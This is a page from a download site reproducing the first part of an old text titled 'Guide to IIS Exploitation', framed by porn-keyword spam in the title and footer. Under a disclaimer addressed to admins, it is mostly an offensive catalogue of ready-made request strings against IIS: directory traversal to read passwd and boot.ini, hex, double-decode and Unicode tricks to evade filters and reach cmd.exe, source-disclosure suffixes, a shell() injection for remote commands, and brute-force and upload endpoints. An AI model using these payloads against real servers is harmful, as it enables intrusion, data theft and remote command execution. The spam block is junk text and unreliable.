亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? guide to iis exploitation.txt

?? 1000 HOWTOs for various needs [WINDOWS]
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
****************************************************************************                      Guide to IIS Exploitation                          **                            by fugjostle                                 **                                                                         **                             V.1.0.1                                     **                                                                         **          Questions? Comments? Email: fugjostle at ch0wn.com             ****************************************************************************    Disclaimer: I do not condone hacking IIS servers in any way,                 shape or form. This guide is intended as a guide                 for admins to help them understand what most                 script kiddies don't understand but are happy to                 exploit. --[On the first day, God created directory traversal]Relative paths are the developers friend. They allow an entire website to be moved to another directory without the need for changing all the links in the html. For example, lets say we have a webpage called 'pictures.html' in the htdocs dir:  Absolute path:  /home/webpages/htdocs/pictures.html  Absolute path:  /home/webpages/images/pic1.gifIn the html you can refer to the 'pic1.gif' via an absolute path shown above or use a relative path:  Relative path: ../images/pic1.gifThe relative path tells the server that it has to go to the parent directory (dot dot) -->  from /home/webpages/htdocs to /home/webpages. Then the server goes into the images dir and looks for the gif file to display.Anyone who has used the 'cd' command in DOS and *nix should be familiar with the operation. So what's the problem I hear you ask... well, the programmers of web server didn't think to check the supplied URL to ensure that the requested file was actually in the web directory. This allows someone to backtrack through the servers directory structure and request files that the web server has access to. For example,  http://www.target.com/../../../etc/passwdNB. you can also use double dots and double quotes. This is useful to evadeIntrusion Detection Systems (IDS):  http://www.target.com//....//....//...././etc/./passwdThe webserver simply strips the extra stuff out and processes the request.This is the same as the previous example and can make string matching IDS'swork for their money.--[On the second day, God created Hexadecimal]Once programmers started to realise the mistake they began to create parser routines to check for naughty URL's and keep the requests within the document root. Then along comes a wiley hacker who wonders if by encoding the URL will it still be recognised by the parser routines.You may have noticed that when you enter a URL that includes a space it is replaced with the hex equivalent (%20):  http://www.target.com/stuff/my index.html  becomes  http://www.target.com/stuff/my%20index.htmland voila, it works. So what would happen if we changed the now denied URL:  http://www.target.com/../../../etc/passwd  to  http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd The parser routine checks for the existence of dots in the path and finds none... the webserver then proceeds with the request.An interesting feature is that you can encode the hex symbol  and the web server will decode it all for you. This is called the "double decode". For example, given the URL "http://victim.com/..%252f..%252fdocs/", the following will take place:(1) On the first decode, the string will be converted to:  "http://victim.com/..%2f..%2fdocs/"  [%25 = '%' so '%252f' is decoded to '%2f'](2) On the second decode, the string will be converted to:  "http://victim.com/../../docs/"  [%2f = '/']--[On the third day, God created Unicode]The World Wide Web is a global phenomenon and as such needs to be globally interoperable. This raised the question of how to deal with all the different character sets around the world. As a response to this, Unicode was created:   -----------------------------------------------------------------   Unicode provides a unique number for every character, no matter    what the platform, no matter what the program, no matter what    the language. The Unicode Standard has been adopted by such    industry leaders as Apple, HP, IBM, JustSystem, Microsoft,    Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is    required by modern standards such as XML, Java, ECMAScript    (JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official    way to implement ISO/IEC 10646. It is supported in many operating    systems, all modern browsers, and many other products.   -----from http://www.unicode.org---------------------------------The problem with Unicode is that it requires 16 bits for a single character and software tended to use 8 bits for a single character. Unicode TransForm using 8 bits (UTF-8) was created. This allows for multibyte encoding where a variable number of bytes can be used for each character:  Character  1-byte  2-byte  3-byte    .         2E      C0 AE   E0 80 AE    /         2F      C0 AF   E0 80 AF    \         5C      C1 9C   E0 81 9C This lead to a new vulnerability in certain webservers. The parser didn't understand this new encoding and allowed it through :-)For example:  www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwdRecent vulnerabilities have been taking advantage of the fact that the web server doesn't understand the Unicode UTF-8 character set but the underlying OS does:  www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dirUnderstanding the distinction between Unicode and UTF-8 can be difficult. Asa general rule of thumb you can use the following format as a guide:  %uxxxx          = Unicode  %xx%xx          = UTF-8  %xx             = Hexidecimal  %xxxx           = Double Decode--[On the fourth day, God created default installs]IIS comes installed with various DLL's (Dynamic Link Libraries) that increase the functionality of the web server. These ISAPI (Internet Server API) applications allow programmers/developers to deliver more functionality to IIS.The DLL's are loaded into memory at startup and offer significant speed over traditional CGI programs. For example, they can be combined with the Internet Database Connector (httpodbc.dll) to create interactive sites that use ODBC to access databases.The problem is that some of these DLL's are insecure and are often installed with sample scripts that demonstrate how to exploit, erm, I mean use them.ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active Server Pages) are basically HTML pages with embedded code that is processed by the webserver before serving it to the client. Here's some examples to illustrate how the sample pages installed by defaultcan aid someone breaking into your site via the ASP.DLL:[prefix all the examples with http://www.target.com]  /default.asp.   ** Appending a '.' to the URL can reveal the source    ** on older systems. Remember hex encoding? You can    ** also try using %2e to do the same thing.  /msadc/samples/adctest.asp   ** This gives you an interface into the msadcs.dll    ** and allows creation of DSN's. Read RFP's stuff   ** for idea's on how to exploit this.  /iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini  /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini   ** You can view the source of anything in the    ** document root. '/msadc/' needs to be in the    ** request as it is checked for, wait for this,   ** security :-)  /index.asp::$DATA   ** Appending '::$DATA' to the URL can reveal   ** the source of the ASP.  /index.asp%81     ** Append a hex value between 0x81 and 0xfe   ** and you can reveal the source of any server   ** processed file. This only works on servers   ** that are Chinese, Japanese or Korean.  /AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|   ** This one allows you to execute remote   ** shell commands ;-)ISM.DLL is used to process requests that end in ".htr". These pages were used to administer IIS3 servers. In IIS4 they are not used but various .htr samples are installed by default anyway and offer another avenue for entry.  /index.asp%20%20%20..(220 more)..%20%20.htr   ** IIS will redirect this request to ISM.DLL,   ** which will strip the '.htr' extension and   ** deliver the source code of the file.    /global.asa+.htr   ** Does the same thing as the %20%20 exploit   ** above. ISM.DLL strips the +.htr and delivers   ** you the source of the file  /scripts/iisadmin/ism.dll?http/dir   ** Excellent brute force opportunity if the   ** dll exists. Successful logons will reveal   ** lots of useful stuff.  /iisadmpwd/aexp.htr   ** The iisadmpwd diectory contains several .htr    ** files that allow NetBIOS resolution and    ** password attacks.  /scripts/iisadmin/bdir.htr??c:\inetpub\www   ** This method will only reveal directories   ** but can be useful for identifying the    ** servers structure for more advanced    ** attacks later.MSADCS.DLL is used to allow access to ODBC components via IIS using RDS (Remote Data Service). RDS is part of the default install of Microsoft Data Access Components (MDAC) and is a commonly exploited on IIS. It can allowarbitrary shell commands to be executed with system privileges.  /msadc/msadcs.dll   ** If this file exists then there's a pretty    ** good chance that you can run the RDS    ** exploit again the box. More on this later.HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the webserver wants to connect to a database. It allows the creation of web pagesfrom data in the database, and it allows you to update/delete items from within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLLfor processing.   /index.idc::$DATA   ** Appending '::$DATA' to the URL can reveal   ** the source of the IDC.  /anything.idc     ** Requesting a non-existance file will   ** reveal the location of the web root.  /scripts/iisadmin/tools/ctss.idc   ** Creates a table based on the parameters it    ** receives. Excellent place to look at for    ** SQL injection.SSINC.DLL is used for processing Server Side Includes (SSI). '.stm', '.shtm' and '.shtml' extension are sent to the DLL which interpretsthe SSI statements within the HTML before sending it to the client.An example of SSI would be:  <!--#include file="news.txt"-->This SSI tells the server to include the 'news.txt' in the final HTML sent to the use. SSI statements are beyond the scope of this document but offer another security hole open to our wiley hax0r. Ensure you remove the app mapping and disable SSI if you do not require its functionality.SSINC.DLL is also vulnerable to a remote buffer overflow, read the following advisory for details:  http://www.nsfocus.com/english/homepage/sa01-06.htmSome examples of SSINC.DLL fun:  /anything.stm   ** If you request a file that doesn't exist   ** then the server error message contains the   ** the location of the web root.  /somedir/anything.stm/somedir/index.asp   ** Using this method allows you to view the   ** the source code for index.asp.   IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'requests. This DLL has had some big exposure with the recent Nimda worm. I'm not going into too much detail but '.ida' was used in a buffer overflow that resulted in user defined code being executed on the server.  /anything.ida or /anything.idq     ** Requesting a non-existance file will   ** reveal the location of the web root.  /query.idq?CiTemplate=../../../boot.ini   ** You can use this to read any file on   ** the same drive as the web rootCPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your IIS server, via a web browser or the Web Publishing Wizard. The existance of this DLL can allow attackers upload files to the server. Other files such asuploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with SiteServer and allow upload of documents to the server:  /scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp   ** If this file is there then you may be able   ** to upload files to the server.  /scripts/uploadn.asp     ** Connecting to this page gives you a nice   ** gui for uploading your own webpages. You   ** probably need to brute the userid.There are lots more example scripts in the default install and quite a few of them are very, very insecure. Microsoft recommends that you remove ALL samples from any production server including the ExAir, WSH, ADO and other installed samples.  IIS Default Web Site  --------------------  IISSAMPLES  - c:\inetpub\iissamples  IISADMIN    - c:\winnt\system32\inetsrv\issadmin  IISHELP     - c:\winnt\help  SCRIPTS     - c:\inetpub\scripts  IISADMPWD   - c:\winnt\systems32\inetsrv\iisadmpwd  msadc       - c:\program files\common files\system\msadc  logfiles    - c:\winnt\system32\logfiles  default.htm - c:\inetpub\wwwroot  IIS Default App Mapping  -----------------------  .asa   - c:\winnt\system32\inetsrv\asp.dll  .asp   - c:\winnt\system32\inetsrv\asp.dll  .cdx   - c:\winnt\system32\inetsrv\asp.dll  .cer   - c:\winnt\system32\inetsrv\asp.dll  .htr   - c:\winnt\system32\inetsrv\ism.dll  .idc   - c:\winnt\system32\inetsrv\httpodbc.dll  .shtm  - c:\winnt\system32\inetsrv\ssinc.dll  .shtml - c:\winnt\system32\inetsrv\ssinc.dll

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
精品国精品自拍自在线| 91成人免费网站| 欧美a一区二区| 亚洲成人av一区二区| 亚洲免费毛片网站| 亚洲色欲色欲www在线观看| 中文字幕亚洲视频| 欧美日本一区二区在线观看| 麻豆精品国产91久久久久久| 亚洲国产中文字幕| 亚洲电影一级片| 日韩精品电影在线观看| 日韩精品乱码av一区二区| 青青草视频一区| 国产在线视视频有精品| 国产乱子伦一区二区三区国色天香| 日韩电影网1区2区| 久久er精品视频| 99亚偷拍自图区亚洲| 91日韩精品一区| 欧美性大战久久久久久久蜜臀| 555夜色666亚洲国产免| 日韩欧美国产成人一区二区| 久久久蜜桃精品| 中文字幕亚洲精品在线观看| 一区二区三区四区在线免费观看| 亚洲成a人v欧美综合天堂下载 | 91亚洲精品久久久蜜桃网站 | 日韩精品一二三四| 日韩电影在线观看一区| 日韩美一区二区三区| 成a人片亚洲日本久久| 91猫先生在线| 日韩一区二区三区三四区视频在线观看 | 亚洲影院免费观看| 美日韩一区二区三区| 国产成人亚洲精品狼色在线| 色狠狠综合天天综合综合| 国产偷国产偷精品高清尤物| 亚洲欧洲精品一区二区三区| 婷婷中文字幕综合| 国产99精品在线观看| 欧美视频一区二区在线观看| 国产日韩av一区二区| 亚洲第四色夜色| 成人av先锋影音| 日韩免费观看高清完整版| 日韩理论片一区二区| 久草这里只有精品视频| 91成人免费网站| 国产精品短视频| 免费xxxx性欧美18vr| 中文字幕av一区二区三区| 美女一区二区视频| 久久蜜桃av一区二区天堂| 97se亚洲国产综合自在线不卡| 亚洲国产欧美在线| 一区二区三区在线不卡| 久久精品综合网| 久久久久久综合| 中文字幕高清一区| 欧美日韩精品高清| 一区二区三区不卡视频| 精品一区二区精品| 欧美日韩国产欧美日美国产精品| 日本不卡一二三区黄网| 久久精品国产亚洲aⅴ| 欧美三级韩国三级日本三斤| 亚洲色图一区二区| 北岛玲一区二区三区四区| 久久久噜噜噜久久中文字幕色伊伊| 日本aⅴ亚洲精品中文乱码| 欧美老女人在线| 亚洲高清免费在线| 精品视频全国免费看| 亚洲va中文字幕| 欧美一区二视频| 蜜臀久久久久久久| 欧美一区二区三区婷婷月色 | 成人福利视频网站| 26uuu亚洲综合色欧美| 裸体歌舞表演一区二区| 久久中文娱乐网| 国产凹凸在线观看一区二区| 久久精品人人做人人爽97| 国产成人一级电影| 国产精品色在线观看| 91丨九色丨蝌蚪丨老版| 亚洲综合在线五月| 欧美精品久久99| 国产一区在线观看视频| 国产日韩欧美精品在线| 99精品国产热久久91蜜凸| 一区二区三区在线播| 91麻豆精品91久久久久久清纯| 日韩影视精彩在线| 精品国产a毛片| 成人在线视频首页| 亚洲精品一二三四区| 欧美一卡二卡在线| 成人av电影观看| 亚洲aⅴ怡春院| 久久久www免费人成精品| 99久久亚洲一区二区三区青草| 性久久久久久久| 国产人伦精品一区二区| 91福利区一区二区三区| 蜜桃视频在线观看一区二区| 中文一区二区完整视频在线观看| 色美美综合视频| 国产一区二区三区四| 亚洲乱码中文字幕| 日韩精品一区国产麻豆| 91亚洲资源网| 经典三级视频一区| 亚洲永久免费av| 国产精品三级在线观看| 欧美一级电影网站| 91视频www| 丁香婷婷综合激情五月色| 亚洲午夜影视影院在线观看| 国产日韩欧美亚洲| 日韩亚洲欧美成人一区| 色婷婷av一区二区三区软件| 韩国av一区二区三区| 午夜欧美视频在线观看| 中文字幕一区二区不卡| 久久久亚洲欧洲日产国码αv| 9191国产精品| 欧美怡红院视频| 91浏览器在线视频| 国产91清纯白嫩初高中在线观看| 日本91福利区| 亚洲成年人影院| 一级精品视频在线观看宜春院| 久久久精品免费免费| 91精品欧美一区二区三区综合在 | 91小视频在线观看| 国内精品免费**视频| 日韩不卡手机在线v区| 亚洲一区二区三区国产| 中文字幕在线观看一区| 欧美韩国日本不卡| 精品国产乱码久久久久久久久| 欧美精品成人一区二区三区四区| 91网站在线播放| 99久久免费国产| 97久久精品人人做人人爽50路| a级精品国产片在线观看| 韩国欧美国产一区| 国产一区二区成人久久免费影院| 老司机精品视频在线| 蜜桃在线一区二区三区| 久久电影网站中文字幕| 蜜桃视频一区二区三区在线观看| 蜜桃av一区二区三区| 久久99国产乱子伦精品免费| 久久成人av少妇免费| 精品一区二区三区免费观看| 国产一区二区三区四区五区入口| 国产一区二区日韩精品| 国产黄色精品视频| 成人av在线播放网站| 91论坛在线播放| 在线播放一区二区三区| 日韩三级在线免费观看| 久久众筹精品私拍模特| 国产精品久久久久久久久图文区| 国产精品久久二区二区| 亚洲精品免费播放| 肉色丝袜一区二区| 美女脱光内衣内裤视频久久网站| 精一区二区三区| 成人一区在线看| 欧美四级电影网| 精品国一区二区三区| 国产欧美日韩在线看| 伊人开心综合网| 激情成人综合网| 99久久伊人精品| 欧美丰满少妇xxxxx高潮对白| 精品区一区二区| 一区二区在线观看视频在线观看| 视频一区欧美精品| 成人午夜av影视| 91精品视频网| 中文字幕字幕中文在线中不卡视频| 亚洲成人久久影院| 国产91露脸合集magnet| 欧美色图在线观看| 国产欧美1区2区3区| 亚洲成人av电影在线| 成人动漫一区二区在线| 日韩美一区二区三区| 亚洲女厕所小便bbb| 国产精品亚洲视频| 欧美疯狂做受xxxx富婆| 亚洲视频香蕉人妖| 国产一级精品在线| 欧美日本一道本|